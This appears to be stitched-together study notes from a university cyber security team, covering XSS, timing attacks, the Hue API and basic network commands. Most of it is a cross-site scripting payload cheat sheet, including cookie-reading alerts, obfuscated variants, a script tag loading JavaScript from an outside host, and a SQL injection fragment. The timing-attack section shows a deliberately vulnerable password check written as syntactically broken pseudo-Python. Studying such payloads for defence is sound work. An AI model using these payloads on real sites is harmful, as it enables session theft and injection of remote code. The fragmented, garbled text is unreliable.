Cross Site Scripting

<ScRipt>ALeRt("hi");</sCRipT> ">

"><img src=x onerror=prompt(document.domain)>

"><img src=x onerror=alert(document.domain)>

"><img src=x onerror=alert(1)>

"><script>alert("Hi");</script> browser?"--></style></script><script>alert("xss")</script> '';!--"<XSS>=&{()} '> <*script>alert("owned")<*/script> %7B%7D%bmk=1 '';!--"<XSS>=&{()} <SCRIPT src=http://ha.ckers.org/xss.js></SCRIPT>

<IMG src="javascript:alert('XSS');"> <IMG src=javascript:alert('XSS')> <IMG src=javascript:alert("XSS")> <IMG src=`javascript:alert("RSnake says, 'XSS'")`> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG src=javascript:alert(String.fromCharCode(88,83,83))>

<IMG src="jav ascript:alert('XSS');"> <IMG src="jav ascript:alert('XSS');"> <script>alert(document.cookie)</script> php?name= <img+src=x+onerro r=alert(1)> ',alert(1),' \ x27 \ x2calert \ x281 \ x29x2c \ x27 ?id=1'+or+id=2--+ <object data="javascript:alert('XSS')"></object>

What is a timing attack?

def authenticate_user(user, pass):

stored_hash=get_password_hash(user):

if stored_hash:

test_hash = sha1(password)

if test_hash == stored_hash:

Return True

Else:

Return False

String Comparison Timing Attacks?

memcmp

while (len != 0)

{

a0 = ((byte *) srcp1)[0];

b0 = ((byte *) srcp2)[0];

srcp1 += 1;

srcp2 += 1;

res = a0 - b0;

if (res != 0)

return res;

len -= 1;

}

What is the Hue API?

● GET /api/<user token>/lights

● Basic RESTful API

● Not very smart - always returns http status 200 even when returning errors.

● User token is the only required auth (no username, no sessions)

● Not very fast (can handle ~30req/s)

Network Administration Testing Methodologies:

Ping Host : Ping <IP Address>
Trace Route Host : tracert <website address> Or <ipaddress>
DNS Lookup : nslookup <Address>
Whois : www.whois.net

Texas A&M University, Commerce - Cyber Security Team

Cross Site Scripting